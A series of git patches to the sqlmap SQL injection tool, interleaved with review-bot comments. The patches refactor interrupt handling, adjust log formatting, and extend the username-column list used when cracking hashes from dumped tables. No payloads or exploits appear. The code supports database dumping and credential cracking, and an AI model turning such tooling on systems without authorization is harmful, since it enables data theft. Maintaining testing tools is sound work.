@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.20" +VERSION = "1.2.12.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3f4a25c92b9..fbd90e7a636 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -b3ffa34552b4594bbba54513069c642b lib/core/option.py +01f7cc33862b2eb2e777f5aff326e2fb lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7983dceb638a5ba80b33209140bb8531 lib/core/settings.py +8e45f357b6d73d128267f3b66fe5e081 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 28e7c8f3787d7cc448377befc5174e1f4d22617c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 15:00:57 +0100 Subject: [PATCH 395/428] Refactoring KeyboardInterrupt mess --- lib/core/settings.py | 2 +- sqlmap.py | 320 ++++++++++++++++++++----------------------- txt/checksum.md5 | 4 +- 3 files changed, 154 insertions(+), 172 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 38ee40015a4..68a6b924483 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.21" +VERSION = "1.2.12.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index d0f4093ff7d..f5e592b0f66 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -172,10 +172,7 @@ def main(): except SqlmapUserQuitException: errMsg = "user quit" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass + logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass @@ -185,10 +182,8 @@ def main(): except SqlmapBaseException as ex: errMsg = getSafeExString(ex) - try: - logger.critical(errMsg) - except KeyboardInterrupt: - pass + logger.critical(errMsg) + raise SystemExit except KeyboardInterrupt: @@ -196,12 +191,9 @@ def main(): except EOFError: print - errMsg = "exit" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass + errMsg = "exit" + logger.error(errMsg) except SystemExit: pass 
@@ -212,140 +204,136 @@ def main(): excMsg = traceback.format_exc() valid = checkIntegrity() - try: - if valid is False: - errMsg = "code integrity check failed (turning off automatic issue creation). " - errMsg += "You should retrieve the latest development version from official GitHub " - errMsg += "repository at '%s'" % GIT_PAGE - logger.critical(errMsg) - print - dataToStdout(excMsg) - raise SystemExit - - elif any(_ in excMsg for _ in ("tamper/", "waf/")): - logger.critical(errMsg) - print - dataToStdout(excMsg) - raise SystemExit - - elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): - errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() - logger.critical(errMsg) - raise SystemExit - - elif "MemoryError" in excMsg: - errMsg = "memory exhaustion detected" - logger.critical(errMsg) - raise SystemExit - - elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): - errMsg = "no space left on output device" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): - errMsg = "corrupted installation detected ('%s'). 
" % excMsg.strip().split('\n')[-1] - errMsg += "You should retrieve the latest development version from official GitHub " - errMsg += "repository at '%s'" % GIT_PAGE - logger.critical(errMsg) - raise SystemExit - - elif "Read-only file system" in excMsg: - errMsg = "output device is mounted as read-only" - logger.critical(errMsg) - raise SystemExit - - elif "OperationalError: disk I/O error" in excMsg: - errMsg = "I/O error on output device" - logger.critical(errMsg) - raise SystemExit - - elif "Violation of BIDI" in excMsg: - errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" - logger.critical(errMsg) - raise SystemExit - - elif "_mkstemp_inner" in excMsg: - errMsg = "there has been a problem while accessing temporary files" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): - errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " - errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): - errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " - errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" - logger.critical(errMsg) - raise SystemExit - - elif "must be pinned buffer, not bytearray" in excMsg: - errMsg = "error occurred at Python interpreter which " - errMsg += "is fixed in 2.7.x. Please update accordingly " - errMsg += "(Reference: https://bugs.python.org/issue8104)" - logger.critical(errMsg) - raise SystemExit - - elif "can't start new thread" in excMsg: - errMsg = "there has been a problem while creating new thread instance. 
" - errMsg += "Please make sure that you are not running too many processes" - if not IS_WIN: - errMsg += " (or increase the 'ulimit -u' value)" - logger.critical(errMsg) - raise SystemExit - - elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): - errMsg = "there has been a problem in enumeration. " - errMsg += "Because of a considerable chance of false-positive case " - errMsg += "you are advised to rerun with switch '--flush-session'" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("pymysql", "configparser")): - errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" - logger.critical(errMsg) - raise SystemExit - - elif "bad marshal data (unknown type code)" in excMsg: - match = re.search(r"\s*(.+)\s+ValueError", excMsg) - errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") - errMsg += ". Please delete .pyc files on your system to fix the problem" - logger.critical(errMsg) - raise SystemExit - - elif kb.get("dumpKeyboardInterrupt"): - raise SystemExit - - elif any(_ in excMsg for _ in ("Broken pipe",)): - raise SystemExit - - for match in re.finditer(r'File "(.+?)", line', excMsg): - file_ = match.group(1) - file_ = os.path.relpath(file_, os.path.dirname(__file__)) - file_ = file_.replace("\\", '/') - if "../" in file_: - file_ = re.sub(r"(\.\./)+", '/', file_) - else: - file_ = file_.lstrip('/') - file_ = re.sub(r"/{2,}", '/', file_) - excMsg = excMsg.replace(match.group(1), file_) + if valid is False: + errMsg = "code integrity check failed (turning off automatic issue creation). 
" + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("tamper/", "waf/")): + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif "MemoryError" in excMsg: + errMsg = "memory exhaustion detected" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): + errMsg = "no space left on output device" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): + errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + raise SystemExit + + elif "Read-only file system" in excMsg: + errMsg = "output device is mounted as read-only" + logger.critical(errMsg) + raise SystemExit + + elif "OperationalError: disk I/O error" in excMsg: + errMsg = "I/O error on output device" + logger.critical(errMsg) + raise SystemExit - errMsg = maskSensitiveData(errMsg) - excMsg = maskSensitiveData(excMsg) + elif "Violation of BIDI" in excMsg: + errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" + logger.critical(errMsg) + raise SystemExit + + elif "_mkstemp_inner" in excMsg: + errMsg = "there has been a problem while accessing temporary files" + logger.critical(errMsg) + raise SystemExit - if conf.get("api") or not valid: - logger.critical("%s\n%s" % (errMsg, excMsg)) + elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): + errMsg = 
"please update the 'sqlalchemy' package (>= 1.1.11) " + errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): + errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " + errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" + logger.critical(errMsg) + raise SystemExit + + elif "must be pinned buffer, not bytearray" in excMsg: + errMsg = "error occurred at Python interpreter which " + errMsg += "is fixed in 2.7.x. Please update accordingly " + errMsg += "(Reference: https://bugs.python.org/issue8104)" + logger.critical(errMsg) + raise SystemExit + + elif "can't start new thread" in excMsg: + errMsg = "there has been a problem while creating new thread instance. " + errMsg += "Please make sure that you are not running too many processes" + if not IS_WIN: + errMsg += " (or increase the 'ulimit -u' value)" + logger.critical(errMsg) + raise SystemExit + + elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): + errMsg = "there has been a problem in enumeration. " + errMsg += "Because of a considerable chance of false-positive case " + errMsg += "you are advised to rerun with switch '--flush-session'" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("pymysql", "configparser")): + errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" + logger.critical(errMsg) + raise SystemExit + + elif "bad marshal data (unknown type code)" in excMsg: + match = re.search(r"\s*(.+)\s+ValueError", excMsg) + errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") + errMsg += ". 
Please delete .pyc files on your system to fix the problem" + logger.critical(errMsg) + raise SystemExit + + elif kb.get("dumpKeyboardInterrupt"): + raise SystemExit + + elif any(_ in excMsg for _ in ("Broken pipe",)): + raise SystemExit + + for match in re.finditer(r'File "(.+?)", line', excMsg): + file_ = match.group(1) + file_ = os.path.relpath(file_, os.path.dirname(__file__)) + file_ = file_.replace("\\", '/') + if "../" in file_: + file_ = re.sub(r"(\.\./)+", '/', file_) else: - logger.critical(errMsg) - kb.stickyLevel = logging.CRITICAL - dataToStdout(excMsg) - createGithubIssue(errMsg, excMsg) + file_ = file_.lstrip('/') + file_ = re.sub(r"/{2,}", '/', file_) + excMsg = excMsg.replace(match.group(1), file_) + + errMsg = maskSensitiveData(errMsg) + excMsg = maskSensitiveData(excMsg) - except KeyboardInterrupt: - pass + if conf.get("api") or not valid: + logger.critical("%s\n%s" % (errMsg, excMsg)) + else: + logger.critical(errMsg) + kb.stickyLevel = logging.CRITICAL + dataToStdout(excMsg) + createGithubIssue(errMsg, excMsg) finally: kb.threadContinue = False 
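Review bot: In the `valid is False` and `tamper/`/`waf/` branches, `dataToStdout(excMsg)` emits the raw traceback before the `excMsg = maskSensitiveData(excMsg)` line further down is reached, so whatever that masking is meant to hide (it is applied to the traceback on every other path) presumably reaches the console unmasked on these two early exits. Changing those two calls to `dataToStdout(maskSensitiveData(excMsg))` closes the gap without moving the later masking, which appears to rely on the path-rewriting loop running first. This predates the commit, but the commit re-emits every line of the handler as new code, so it is worth fixing in the same pass. The `except` clause and the enclosing `main()` both begin outside this hunk.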
@@ -366,45 +354,39 @@ def main(): shutil.rmtree(kb.tempDir, ignore_errors=True) if conf.get("hashDB"): - try: - conf.hashDB.flush(True) - except KeyboardInterrupt: - pass + conf.hashDB.flush(True) if conf.get("harFile"): with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) if conf.get("api"): - try: - conf.databaseCursor.disconnect() - except KeyboardInterrupt: - pass + conf.databaseCursor.disconnect() if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization - try: - _ = time.time() - while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: - time.sleep(0.01) - - if cmdLineOptions.get("sqlmapShell"): - cmdLineOptions.clear() - conf.clear() - kb.clear() - conf.disableBanner = True - main() - except KeyboardInterrupt: - pass - finally: - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if threading.activeCount() > 1: - os._exit(0) + _ = time.time() + while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: + time.sleep(0.01) + + if cmdLineOptions.get("sqlmapShell"): + cmdLineOptions.clear() + conf.clear() + kb.clear() + conf.disableBanner = True + main() if __name__ == "__main__": - main() + try: + main() + except KeyboardInterrupt: + pass + finally: + # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program + if threading.activeCount() > 1: + os._exit(0) else: # cancelling postponed imports (because of Travis CI checks) from lib.controller.controller import start diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fbd90e7a636..0265695baa5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
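Review bot: The finalization wait `while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT:` has its comparison inverted: on entry `time.time() - _` is close to zero, so the condition is false immediately and the loop never sleeps, which means the "short delay for thread finalization" comment above it does not describe what happens. It should read `(time.time() - _) < THREAD_FINALIZATION_TIMEOUT`, and `_` deserves a name, e.g. `start = time.time()`. The defect existed before this commit, but the loop is re-emitted here as new code after the try/except removal. Note also that the top-level `except KeyboardInterrupt: pass` in the `__main__` guard makes an interrupted run end with exit status 0 (either by falling off the end or via `os._exit(0)`); if callers rely on the exit code to detect an aborted scan, a non-zero `SystemExit` there would be more useful.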
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e45f357b6d73d128267f3b66fe5e081 lib/core/settings.py +7d446786d9c7f49c591f382079d39787 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -55ba3999ab8819e0d34ca075d46fa9dd sqlmap.py +82f2326ec9cc8719859266f72c19f9b3 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 4fe4c582c1ee6c9a43a0358bb7984008622bf686 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 15:15:54 +0100 Subject: [PATCH 396/428] Minor output adjustments --- lib/core/settings.py | 2 +- lib/techniques/error/use.py | 2 +- lib/techniques/union/use.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 68a6b924483..d80bb3afe8f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.22" +VERSION = "1.2.12.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 76f2e84b412..c252570b932 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -244,7 +244,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e if kb.fileReadMode and output and output.strip(): print elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) + status = "[%s] [INFO] %s: '%s'" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) if len(status) > width: status = "%s..." % status[:width - 3] diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 7e68fb2d01b..49624d59c63 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -373,7 +373,7 @@ def unionThread(): del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: - _ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items + _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, basestring) else [items])) status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) if len(status) > width: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0265695baa5..bb733044c27 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
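Review bot: Style point on the `unionThread` hunk: the rewritten line both assigns `_` and uses `_` as the generator variable, and `_` conventionally marks a throwaway, so the following `status = ... _ if kb.safeCharEncode ...` line reads as if it were using a discarded value. Naming it, e.g. `values = ','.join("'%s'" % value for value in (flattenValue(arrayizeValue(items)) if not isinstance(items, basestring) else [items]))`, and using `values` in the `status` line would make the intent clear. `unionThread` begins and ends outside this hunk.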
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7d446786d9c7f49c591f382079d39787 lib/core/settings.py +1cf1beb635623adec866df474cebc88c lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -96,11 +96,11 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -214d916bb8b456ae698ca0f5523186ff lib/techniques/error/use.py +686904374067047b521151301321b30a lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py -dbddd178a6ca941fa745d9b3edbb979b lib/techniques/union/use.py +1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py 038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py From 1e508547d833f0b758f781e4475c84a189f5a523 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 16:08:14 +0100 Subject: [PATCH 397/428] Trivial console output update --- lib/core/settings.py | 2 +- lib/utils/api.py | 30 +++++++++++++++--------------- txt/checksum.md5 | 4 ++-- 3 files changed, 18 insertions(+), 18 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d80bb3afe8f..cb38dac665f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.23" +VERSION = "1.2.12.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 05f39e879e7..ed97128aadd 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -376,7 +376,7 @@ def task_delete(taskid): if taskid in DataStore.tasks: DataStore.tasks.pop(taskid) - logger.debug("[%s] Deleted task" % taskid) + logger.debug("(%s) Deleted task" % taskid) return jsonize({"success": True}) else: response.status = 404 @@ -399,7 +399,7 @@ def task_list(token=None): if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: tasks[key] = dejsonize(scan_status(key))["status"] - logger.debug("[%s] Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + logger.debug("(%s) Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin/flush") @@ -414,7 +414,7 @@ def task_flush(token=None): DataStore.tasks[key].engine_kill() del DataStore.tasks[key] - logger.debug("[%s] Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + logger.debug("(%s) Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True}) ################################## 
@@ -431,7 +431,7 @@ def option_list(taskid): logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) - logger.debug("[%s] Listed task options" % taskid) + logger.debug("(%s) Listed task options" % taskid) return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) @post("/option//get") @@ -450,10 +450,10 @@ def option_get(taskid): if option in DataStore.tasks[taskid].options: results[option] = DataStore.tasks[taskid].options[option] else: - logger.debug("[%s] Requested value for unknown option '%s'" % (taskid, option)) + logger.debug("(%s) Requested value for unknown option '%s'" % (taskid, option)) return jsonize({"success": False, "message": "Unknown option '%s'" % option}) - logger.debug("[%s] Retrieved values for option(s) '%s'" % (taskid, ",".join(options))) + logger.debug("(%s) Retrieved values for option(s) '%s'" % (taskid, ",".join(options))) return jsonize({"success": True, "options": results}) @@ -474,7 +474,7 @@ def option_set(taskid): for option, value in request.json.items(): DataStore.tasks[taskid].set_option(option, value) - logger.debug("[%s] Requested to set options" % taskid) + logger.debug("(%s) Requested to set options" % taskid) return jsonize({"success": True}) # Handle scans @@ -499,7 +499,7 @@ def scan_start(taskid): # Launch sqlmap engine in a separate process DataStore.tasks[taskid].engine_start() - logger.debug("[%s] Started scan" % taskid) + logger.debug("(%s) Started scan" % taskid) return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) @get("/scan//stop") @@ -514,7 +514,7 @@ def scan_stop(taskid): DataStore.tasks[taskid].engine_stop() - logger.debug("[%s] Stopped scan" % taskid) + logger.debug("(%s) Stopped scan" % taskid) return jsonize({"success": True}) @get("/scan//kill") 
@@ -529,7 +529,7 @@ def scan_kill(taskid): DataStore.tasks[taskid].engine_kill() - logger.debug("[%s] Killed scan" % taskid) + logger.debug("(%s) Killed scan" % taskid) return jsonize({"success": True}) @get("/scan//status") @@ -547,7 +547,7 @@ def scan_status(taskid): else: status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" - logger.debug("[%s] Retrieved scan status" % taskid) + logger.debug("(%s) Retrieved scan status" % taskid) return jsonize({ "success": True, "status": status, @@ -575,7 +575,7 @@ def scan_data(taskid): for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_errors_message.append(error) - logger.debug("[%s] Retrieved scan data and error messages" % taskid) + logger.debug("(%s) Retrieved scan data and error messages" % taskid) return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) # Functions to handle scans' logs @@ -602,7 +602,7 @@ def scan_log_limited(taskid, start, end): for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) - logger.debug("[%s] Retrieved scan log messages subset" % taskid) + logger.debug("(%s) Retrieved scan log messages subset" % taskid) return jsonize({"success": True, "log": json_log_messages}) @get("/scan//log") 
@@ -621,7 +621,7 @@ def scan_log(taskid): for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) - logger.debug("[%s] Retrieved scan log messages" % taskid) + logger.debug("(%s) Retrieved scan log messages" % taskid) return jsonize({"success": True, "log": json_log_messages}) # Function to handle files inside the output directory @@ -642,7 +642,7 @@ def download(taskid, target, filename): return jsonize({"success": False, "message": "Forbidden path"}) if os.path.isfile(path): - logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) + logger.debug("(%s) Retrieved content of file %s" % (taskid, target)) with open(path, 'rb') as inf: file_content = inf.read() return jsonize({"success": True, "file": base64encode(file_content)}) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bb733044c27..f9d45cb49e4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1cf1beb635623adec866df474cebc88c lib/core/settings.py +b82a5d34d68888945c51c84810d4d4b3 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
@@ -101,7 +101,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py -038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py +fd1ede20ec674518a54966eaf0c9f8c6 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py From b288bfdbc318327f092113375f3a5d8a58ffd678 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:03:51 +0100 Subject: [PATCH 398/428] Minor update --- lib/core/settings.py | 4 ++-- lib/utils/hash.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cb38dac665f..70f62b8b7d5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.24" +VERSION = "1.2.12.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
@@ -585,7 +585,7 @@ UNENCODED_ORIGINAL_VALUE = "original" # Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor", "client", "cuser") +COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "cuser") # Default delimiter in GET/POST values DEFAULT_GET_POST_DELIMITER = '&' diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 05cd2a817c4..e6381d58ac5 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -623,7 +623,7 @@ def attackDumpedTable(): col_passwords = set() attack_dict = {} - for column in columns: + for column in sorted(columns, key=lambda _: len(_), reverse=True): if column and column.lower() in COMMON_USER_COLUMNS: col_user = column break diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9d45cb49e4..b253cf02f26 100644 --- 